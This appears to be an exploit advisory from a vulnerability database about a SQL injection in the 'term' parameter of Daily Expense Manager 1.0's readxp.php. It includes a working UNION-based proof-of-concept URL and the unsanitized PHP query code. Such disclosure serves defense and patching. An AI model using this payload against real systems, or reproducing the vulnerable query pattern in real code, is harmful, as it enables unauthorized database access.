Daily Expense Manager 1.0 SQL Injection

2024.04.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-74
CWE-89

# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi # Date: February 25th, 2024 # Exploit Author: Stefan Hesselman # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Kali Linux # CVE: N/A # CWE: CWE-89, CWE-74 ## Description Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database. ## Vulnerable endpoint: http://example.com/Daily-Expense-Manager/readxp.php?term=asd ## Vulnerable HTTP parameter: term (GET) ## Exploit proof-of-concept: http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20- ## Vulnerable PHP code: File: /Daily-Expense-Manager/readxp.php, Lines: 16-23 <?php [...] //get search term $searchTerm = $_GET['term']; # unsanitized and under control of the attacker. //get matched data from skills table $query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname"); while ($row = $query->fetch_assoc()) { $data[] = $row['pname']; } //return json data echo json_encode($data); ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top